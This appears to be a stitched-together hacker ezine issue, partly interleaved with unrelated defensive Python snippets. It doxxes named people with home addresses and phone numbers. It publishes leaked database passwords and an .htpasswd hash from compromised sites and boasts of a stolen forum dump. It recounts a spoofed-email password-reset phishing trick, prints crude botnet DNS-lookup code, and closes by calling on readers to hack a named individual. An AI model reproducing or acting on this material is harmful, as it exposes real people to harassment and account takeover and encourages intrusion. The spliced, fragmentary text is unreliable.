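Aug  8 18:00:42 ftp1 proftpd[8064]: ftp1.example.net (203.0.113.7[203.0.113.7]) - USER test: no such user found from 203.0.113.7 [203.0.113.7] to 192.0.2.10:21
Aug  8 18:00:42 ftp1 proftpd[8065]: ftp1.example.net (203.0.113.7[203.0.113.7]) - USER anonymous: no such user found from 203.0.113.7 [203.0.113.7] to 192.0.2.10:21
Aug  8 18:00:42 ftp1 proftpd[8066]: ftp1.example.net (203.0.113.7[203.0.113.7]) - USER siteowner (Login failed): Incorrect password.
Aug  8 18:05:00 ftp1 proftpd[8100]: ftp1.example.net (198.51.100.20[198.51.100.20]) - USER webdev (Login failed): Incorrect password.
Aug  8 18:06:10 ftp1 proftpd[8101]: ftp1.example.net (198.51.100.20[198.51.100.20]) - USER webdev: Login successful.
Aug  8 19:53:59 ftp1 proftpd[14208]: ftp1.example.net (203.0.113.7[203.0.113.7]) - USER siteowner: Login successful.
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The second alert kind is the one worth paging on: a single mistyped password followed by a login (the 198.51.100.20 lines) stays quiet, while a login that follows a guessing run means the account's password has to be treated as known to the source.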
Since those admins seemed to do some digging on Phate, we decided to show them
how to gather personal info about someone via the web:
[penguin]$ cat personal.txt
Name: Said Azizian
Phone number: 1-(951)-817-9345
Address: 2981 Veranda Lane, Corona California, 92882
School's website: www.cnusd.k12.va.us
Map of area around house:
http://www.google.com/maps?f=q&hl=en&q=2981+Veranda+Lane+92882&ie=UTF8&ll=33.848058,
-117.592705&spn=0.001742,0.005407&t=k&om=1
There's also this gem that was stumbled across. Apparently, Christopher
O'Shields (aka psychomarine) wants to hold a conference, and is thinking of
having Kevin Mitnick as a guest speaker:
[penguin]$ cat mitnick.txt
X-Gmail-Received: 2ddcd30f76051b612c0ef61ea98b03fa0de3121a
Delivered-To: charade000@gmail.com
Received: by 10.70.63.4 with SMTP id l4cs308477wxa;
Wed, 23 Aug 2006 09:25:37 -0700 (PDT)
Received: by 10.65.75.19 with SMTP id c19mr660492qbl;
Wed, 23 Aug 2006 09:25:35 -0700 (PDT)
Received: by 10.65.123.16 with HTTP; Wed, 23 Aug 2006 09:25:35 -0700 (PDT)
Message-ID: <a20b9f470608230925k4c5b6ea6ud77c430562abb1b6@mail.gmail.com>
Date: Wed, 23 Aug 2006 12:25:35 -0400
From: psychomarine <psychomarine@gmail.com>
To: charade000@gmail.com
Subject: Fwd: Mitnick inquiry from yesterday
In-Reply-To: <26467889.254701156336835284.JavaMail.servlet@perfora>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_71926_18041514.1156350335275"
References: <26467889.254701156336835284.JavaMail.servlet@perfora>
------=_Part_71926_18041514.1156350335275
Content-Type: multipart/alternative;
boundary="----=_Part_71927_25886265.1156350335275"
------=_Part_71927_25886265.1156350335275
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
here read this whole email.
---------- Forwarded message ----------
From: mitnick@newleafproductions.com <mitnick@newleafproductions.com>
Date: Aug 23, 2006 8:40 AM
Subject: Mitnick inquiry from yesterday
To: psychomarine@gmail.com
Hi Christopher:
Thank you for writing yesterday to see if Mr. Mitnick is available for your
upcoming event in Orlando, FL.
I'd be happy to discuss this possibility with the speaker; I just need a few
more pieces of information to ensure I understand the scope of this possible
appearance.
Once I have your response to these questions, I'll talk to Kevin about it
and get right back to you. In the interim, I've included Mr. Mitnick's
pricing, below.
Many thanks,
Amy Gray
Questions:
What type of gathering do you plan to hold? Live? Virtual? Both?
Would the speaker you are asking about be a keynote speaker? Panelist?
Other? Please be as specific as you can about the possible role(s) for the
speaker, on-site at the event.
How many people are you hoping to attract to your event?
Do you have a preferred date/timeframe for your event? A target month? A
specific date? All dates open at this point?
===================
Fees for engagements booked within the US/Canada:
Kevin Mitnick
60 minute presentation followed by 15 minutes of open Q&A: $18,500 USD plus
business class travel and expenses
If you would consider a different format (ie: no prep required of the
speaker-- for instance, 60 minute panel participation or 60 minute interview
with a moderator format), then the pricing would go down to: $16,000 USD
plus T&E as described above.
The fee for a videoconference (presentation or panel session) are the same
as quoted above, but hosts would save significantly on travel expenses --
expenses would likely only be the cost of connectivity/phone line and local
travel to/from the satellite uplink/studio, if needed.
All fees quoted in this email are net to the speaker and are paid directly
to Mitnick Security Consulting. 50% is due at the time of agreement signing
via wire transfer--once that payment is rec'd, New Leaf sends an official
confirmation via email and promotion of the speaker's involvement can
commence. The balance is due, plus an estimated advance for out of pocket
travel, 30 days before the Speaker departs for the event.
--
Topics:
Mr. Mitnick has four excellent presentations to choose from, including his
signature presentation: The Art of Deception. Full descriptions are
available for each presentation topic at
www.NewLeafProductions.com/mitnick.html
>
>-----Original Message-----
>From: MSC Web Contact Form [mailto:webcontact@mitsec.com]
>Sent: Tuesday, August 22, 2006 8:40 PM
>Subject: Mitnick Security - Web Contact Form Submission
>
>A new contact submission has been submitted.
>
>Name: Christopher O'Shields
>Company: Enigma Group
>Address 1: 603 caborca ct
>Address 2:
>City: ocoee
>State: FL
>Zip: 34761
>Country: US
>
>Phone: 4076412530
>Fax:
>Email: psychomarine@gmail.com
>
>Notes:
>Simple really, I own a website dedicated to training people in Web
>Security.
>Weve been open for about 3 years now and were having a conference, in
>orlando florida this year. We would like to inquire on what it would take
>to have you as a speaker on social engineering. Thank You.
>
>Expressed Interests:
>Add to Mailing List
>Speaker Inquiry
--
Amy Gray
Speaker's Agent for Kevin Mitnick and Steve Wozniak
New Leaf Productions LLC
Box 51586
Boston, MA 02205
Phone: 617-916-9570 (NEW, as of June 2nd, 2006)
Fax: 617-507-5847
Email: Amy@NewLeafProductions.com
------=_Part_71927_25886265.1156350335275--
------=_Part_71926_18041514.1156350335275
Content-Type: text/x-vcard; name=Contact-1156304399.vcf;
charset=ANSI_X3.4-1968
Content-Transfer-Encoding: base64
X-Attachment-Id: 0.1
Content-Disposition: attachment; filename="Contact-1156304399.vcf"
------=_Part_71926_18041514.1156350335275
Content-Type: text/plain; name=ATT00110.txt; charset=ANSI_X3.4-1968
Content-Transfer-Encoding: base64
X-Attachment-Id: 0.2
Content-Disposition: attachment; filename="ATT00110.txt"
Cg==
------=_Part_71926_18041514.1156350335275--
[penguin]$ ./base64.pl -f attachment.txt
Decoding attachment.txt...
BEGIN:vCard
VERSION:3.0
N:O'Shields;Christopher ;;;
FN:Christopher O'Shields
ORG:Enigma Group
ADR;:;;603 caborca ct
;ocoee;FL;34761;US;
TEL;TYPE=VOICE,MSG:4076412530
TEL;TYPE=FAX:
EMAIL;TYPE=INTERNET,PREF:psychomarine@gmail.com
NOTE;ENCODING=QUOTED-PRINTABLE:Simple really, I own a website dedicated to
training people in Web Security. Weve been open for about 3 years now and
were having a conference, in orlando florida this year. We would like to
inquire on what
it would take to have you as a speaker on social engineering. Thank You.
END:vCard
So, after all this, it looks like if this is the best, I'd rather be a noob.
}
sub Critical-Security {
In a day and age where computers hold sensitive personal information such as social
security numbers, credit card numbers, and passwords, society looks to those who
have a higher understanding of what needs to be done to prevent this information
from getting into the wrong hands. Security is such a Critical part of computing now
that we all must embrace it, understand it, and use it. Unfortunately, there are
those who call themselves hackers. They claim they want to help the community, and
they claim to have a higher understanding of what needs to be done to prevent such
sensitive information from getting out to the public. But would you really listen to
these people when they cannot even prevent their own information from leaking out to
the public? The community I speak of is a community who call themselves Critical
Security.
And now the moment you've all been waiting for, les dossiers:
[penguin]$ cat config.php
<?php
$INFO['sql_driver'] = 'mysql';
$INFO['sql_host'] = 'mysql.criticalsecurity.net';
$INFO['sql_database'] = 'critical';
$INFO['sql_user'] = 'critsec';
$INFO['sql_pass'] = 'kd__2fd_b^svDja';
$INFO['sql_tbl_prefix'] = 'crtisec_';
$INFO['sql_debug'] = '0';
$INFO['board_start'] = '1135538877';
$INFO['installed'] = '1';
$INFO['php_ext'] = 'php';
$INFO['safe_mode'] = '0';
$INFO['board_url'] = 'http://www.criticalsecurity.net';
$INFO['admin_group'] = '4';
$INFO['guest_group'] = '2';
$INFO['member_group'] = '3';
$INFO['auth_group'] = '1';
$INFO['mysql_tbl_type'] = 'MyISAM';
$INFO['pre_closed'] = 'Closed: ';
?>
[penguin]$ echo Mmmmm.... Databases.
Mmmmm.... Databases.
[penguin]$ cat members_johnable.txt
Perhaps Critical Security should rename themselves "Chimerical Security".
}
sub DamnSmallLinux {
In the flurry of bootable OSes over the past few years, one has stood out above the
others. Being one of the most used and featured discs, you would expect this site to
have a nicely locked down website. After all, it wouldn't take much time to add a
few 'advanced features' to the ISO now, would it? A few collisions later and your ISO
is as good as 'new'. Going from a publicly renowned disc to a publicly owned disc
certainly wouldn't take much. It's probably secure though, right?
Ladies and Gentlemen, I present to you, Damn Owned Linux.
[penguin]$ cat shadow
[penguin]$ cat phpbbconfig.php
<?php
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = 'phpBB2';
$dbuser = 'phpBB2user';
$dbpasswd = 'dsl-n';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
[penguin]$ cat wikiconfig.php
<?php
// config.php
//
// This file was generated by the install/configure.pl script based
// on values entered by the administrator. It contains the most
// common (and vital) configuration parameters for WikkiTikkiTavi to
// run.
//
// You may edit this file by hand or use configure.pl to generate a
// new copy.
//
// Certain other settings may be configured; look in lib/defaults.php
// to see them. Rather than changing them in lib/defaults.php, you
// should copy them from there to here. The settings here will safely
// over-ride those in lib/defaults.php.
// $Admin specifies the administrator e-mail address used in error messages.
$Admin = 'john@damnsmalllinux.org';
// If $DBPersist is not 0, persistent database connections will be used.
// Note that this is not supported by all hosting providers.
$DBPersist = 0;
// $DBServer indicates the hostname of the database server. It may be
// set to '' for the local host.
$DBServer = '';
// $DBName indicates the name of the database that the wiki should use.
$DBName = 'mywikidatabasename';
// $DBUser indicates the name of the database user.
$DBUser = 'wikiuser';
// $DBPasswd indicates the password to use for database access.
$DBPasswd = '4dslwiki4';
<snip snip>
Hmm..John, you sure do like numbers in your passwords.
[penguin]$ cat .htpasswd
storeadmin:APDj/CY5pGMhU
[penguin]$ wc -l forum.dsl.csv
14143 forum.dsl.csv
Hmm...
[penguin]$ cat forum.dsl.csv
After a while, developing Damn Owned Linux got a little boring, so I decided to have
a little fun with John and his admin/development team.
[penguin]$ cat email1.txt
From: robert.shingledecker@hushmail.com
To: john@damnsmalllinux.org
Date: Sat, 06 Jan 2007 14:56:54 +0000
This message is not encrypted, and is not digitally signed by
"robert.shingledecker@hushmail.com" <robert.shingledecker@hushmail.com> .
Hi John,
Late last night I decided to change a few of my passwords for
sources related to DSL. In my haste I managed to typo my 'passwd'
command after pasting in my complex password. Sometimes you have to
laugh.
Of course, I now cannot login to view my email, so would it be
possible for you to reset my password for me.
Also, did you read that email from Chris yet? Have you any ideas
about the problem he's having with Skype VOIP?
You can contact me on this address
(Robert.Shingledecker@hushmail.com)
Robert
[penguin]$ cat email2.txt
From: John@damnsmalllinux.org
To: robert.shingledecker@hushmail.com
Date: Sun, 07 Jan 2007 08:47:40 +0000
This message is not encrypted, and is not digitally signed by . Invite
John@damnsmalllinux.org to join Hushmail!
Hi Robert,
I reset your password to:
1robertpw2007
I don't know what is going on with him and sound. I do know that some of
the later Via chipsets don't have a working mic with DSL. Maybe he should
make sure it isn't a hardware issue first.
John
<snip snip>
Oh damn, you certainly slipped up there John. Hook, line and sinker.
Finally, please give your comments regarding DOL on the DSL forum. If you can spot
the 'new' features I'd like to know what you think of them.
Yours, Robert Shingledecker ;)
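A mail-filter check for the exchange above, added here as an example and not part of the original issue: it holds a password-reset request that arrives from outside the accounts' own domain under a known account holder's name. `ORG_DOMAIN`, `KNOWN_ACCOUNTS` and the function `assess` are assumptions made for the sketch; the first sample is an excerpt of email1.txt as quoted above, the second is constructed.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Assumed policy data for this sketch: the domain the accounts live on and
# the account names whose passwords the admin is able to reset.
ORG_DOMAIN = "damnsmalllinux.org"
KNOWN_ACCOUNTS = {"john", "robert"}

RESET_RE = re.compile(r"\b(reset|change|recover)\b[^.?!]{0,40}\bpasswords?\b", re.I)
ADDR_RE = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")

def assess(raw_message):
    """Return (verdict, reasons) for one single-part message given as text."""
    msg = message_from_string(raw_message)
    _, sender = parseaddr(msg.get("From", ""))
    local, _, domain = sender.lower().rpartition("@")
    body = " ".join(msg.get_payload().split())  # undo hard line wraps
    reasons = []
    if not RESET_RE.search(body):
        return "deliver", reasons
    reasons.append("asks for a password reset")
    if domain == ORG_DOMAIN:
        # From: is not authentication; a real filter would also require a
        # passing SPF/DKIM result before trusting this branch.
        return "deliver", reasons
    reasons.append("sender domain %s is not %s" % (domain, ORG_DOMAIN))
    matched = set(re.split(r"[^a-z0-9]+", local)) & KNOWN_ACCOUNTS
    if matched:
        reasons.append("sender name matches account: " + ", ".join(sorted(matched)))
    outside = {d.lower() for d in ADDR_RE.findall(body)} - {ORG_DOMAIN}
    if outside:
        reasons.append("body steers replies to: " + ", ".join(sorted(outside)))
    return "hold", reasons

# Excerpt of email1.txt as quoted on this page.
SAMPLE_FROM_PAGE = """From: robert.shingledecker@hushmail.com
To: john@damnsmalllinux.org
Date: Sat, 06 Jan 2007 14:56:54 +0000

Of course, I now cannot login to view my email, so would it be
possible for you to reset my password for me.
You can contact me on this address
(Robert.Shingledecker@hushmail.com)
"""

# Constructed message with no reset request, for contrast.
SAMPLE_CONSTRUCTED = """From: chris@example.net
To: john@damnsmalllinux.org

Have you any ideas about the Skype VOIP problem?
"""

if __name__ == "__main__":
    for sample in (SAMPLE_FROM_PAGE, SAMPLE_CONSTRUCTED):
        verdict, reasons = assess(sample)
        print(verdict, reasons)
```

A held request is released only after the account holder confirms it through a contact channel already on file, never through the address the request itself supplies.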
}
sub Lordabot {
/*
Ladies & gentlemen, children of all ages, LordApocolypse brings to you the future
of botnets ...
... The "LordaBot"
*/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h> /* atoi, rand, srand, exit */
#include <string.h> /* strcpy, strcmp, strlen, memset */

IN_ADDR iaddr;
int dohost();
void strip();
char *hostt1;
char Host1[512];
/* ip11..ip14: octets of the address most recently split by strip() */
int ip11;
int ip12;
int ip13;
int ip14;
/* ip21..ip24: octets saved from the first lookup */
int ip21;
int ip22;
int ip23;
int ip24;
char Scanning_ip[32];

int main()
{
    /* First lookup: resolve, split into octets, save them in ip21..ip24 */
    strcpy(Host1,"command_ip.somesite.com");
    if (dohost() == 666)
    {
        printf("Some DNS error occured, fuck you!");
        exit(1);
    }
    strip();
    ip21 = ip11;
    ip22 = ip12;
    ip23 = ip13;
    ip24 = ip14;
    /* Second lookup: its octets stay in ip11..ip14 */
    strcpy(Host1,"target_ip.somesite.com");
    // dohost();
    if (dohost() == 666)
    {
        printf("Some DNS error occured, fuck you!");
        exit(1);
    }
    strip();
    printf("o1: %i\n",ip11);
    printf("o2: %i\n",ip12);
    printf("o3: %i\n",ip13);
    printf("o4: %i\n",ip14);
    printf("d1: %i\n",ip21);
    printf("d2: %i\n",ip22);
    printf("d3: %i\n",ip23);
    printf("d4: %i\n",ip24);
    return 0;
}

/* Resolve Host1 (dotted quad or hostname) into Scanning_ip; returns 666 on failure */
int dohost()
{
    WSADATA WSData;
    LPHOSTENT lpHostEntry = NULL;
    SOCKADDR_IN SockAddr;
    SOCKET sock;

    if (WSAStartup(MAKEWORD(1, 1), &WSData) != 0)
        return 666;
    if ((sock = socket( AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
    {
        WSACleanup();
        return 666;
    }
    closesocket(sock); /* never used for a connection; release it */
    memset(&SockAddr, 0, sizeof(SockAddr));
    SockAddr.sin_family = AF_INET;
    iaddr.s_addr = inet_addr(Host1);
    if (iaddr.s_addr == INADDR_NONE)
        lpHostEntry = gethostbyname(Host1); //hostname
    if (lpHostEntry == NULL && iaddr.s_addr == INADDR_NONE) //error dns
    {
        WSACleanup();
        return 666;
    }
    if (lpHostEntry != NULL)
        SockAddr.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list); //hostname
    else
        SockAddr.sin_addr = iaddr; //ip address
    hostt1 = inet_ntoa(SockAddr.sin_addr);
    strcpy(Scanning_ip,hostt1);
    printf("%s\n",Scanning_ip);
    WSACleanup();
    return 0;
}

/* Split Scanning_ip on '.' into ip11..ip14; an octet written as "x" becomes random */
void strip()
{
    DWORD c,token,d;
    char buf[4];
    memset(buf,0,sizeof(buf)); /* buf is read by strcmp/atoi, so it must start terminated */
    for (d=0,c=0,token=0;c<=strlen(Scanning_ip);c++)
    {
        if (Scanning_ip[c] == 46 || c == strlen(Scanning_ip)) { /* 46 is '.' */
            srand(GetTickCount());
            if (token == 0) {
                if (strcmp(buf,"x") == 0) ip11 = (rand()%254);
                else ip11 = atoi(buf);
            }
            if (token == 1) {
                if (strcmp(buf,"x") == 0) ip12 = (rand()%254);
                else ip12 = atoi(buf);
            }
            if (token == 2) {
                if (strcmp(buf,"x") == 0) ip13 = (rand()%254);
                else ip13 = atoi(buf);
            }
            if (token == 3) {
                if (strcmp(buf,"x") == 0) ip14 = (rand()%254);
                else ip14 = atoi(buf);
            }
            memset(buf,0,sizeof(buf));
            d=0;
            token++;
            continue;
        }
        else if (d < sizeof(buf) - 1) { /* keep room for the terminating NUL */
            buf[d] = Scanning_ip[c];
            d++;
        }
    }
}
Now we got this little bugger out of Phorce's special library of code. The future of
botnets? Thank goodness the Phorce team came up with such an original idea, no one
would have ever thought of using DNS to control bots...
}
sub CF0 {
== CF0: Call for 0wning ==
Ladies and gentlemen, today we throw you a bone. This is how it works. We give a
name. If you own him, and do so before we do, then you win. You can ask us for some
kind of prize. Anyways, it is all in good fun, because this person needs to go down
either way.
== The Target ==
Your target is a shameless corporate tool. His name is Mark Hinge and his
contemporary nick is psg. Haven't heard of him? That's probably because he isn't
worth hearing about. But, if you would like some information, he kindly provides you
with some. Please visit the Wikipedia entry he wrote about himself,
http://en.wikipedia.org/wiki/Mark_Hinge. Notice how his article is long and
detailed. Also notice that he kindly provides links to his various pages, even
including his Myspace page, hoping to increase his hit counts. Notice how he lists
himself under the categories "Computer security specialists" and "Computer hacking".
Notice how his article is quite large in comparison to the articles about Matt
Blaze, Michael Lynn, Joanna Rutkowska, Johannes Ullrich, Michal Zalewski, among many
other "computer security specialists" of whom you are no doubt aware.
== His Accomplishments ==
Mark has been writing for shitty, content-lacking ezines since the 1990s, including
such advanced pieces as "Nameless Epitome" and "Murder in the Pump Room". Lately he
is the driving force and top employee of Whitedust, a computer news source, on which
he has written a few shitty papers that lack any technical content. If you are
unfamiliar with Whitedust, please take a look at whitedust.net or the Wikipedia
article on it, written by, surprise surprise, psg himself, at
http://en.wikipedia.org/wiki/Whitedust. One can also read the Wikipedia article he
wrote about SOL, at http://en.wikipedia.org/wiki/The_Syndicate_Of_London. Along with
these obvious acts of disinformation, psg found time to stick his name in the
article titled "Hacker".
Aside from these accomplishments, if they can be so termed, he has sold his soul.
== Why ==
Same old, same old. Mark misrepresents himself as a talented "hacker" who has been
part of "the scene" for an extended period of time, and thus as someone whose
opinion on security subjects matters. In reality, he merely has a layman's knowledge
of technical subjects. However, he is selling himself as a product, to ignorant
expert-seekers who know no better. Sooner or later psg is going to make all of us
look bad.
I think it is only fitting that a man who tries to bring so much positive attention
upon himself would by the same action bring considerable negative attention.
Frankly, I expect that if anyone bothers owning him, he will try to recover as
quickly as possible, and in the future present himself as having withstood the
onslaught of the underground, without mentioning his casualties.
So, we might as well make it hurt. Game on.
}
sub Contact {
Since we know you all enjoyed this issue very, very much, we set up an e-mail account
for you to send us your questions or comments, so feel free!
iLite@hushmail.com
}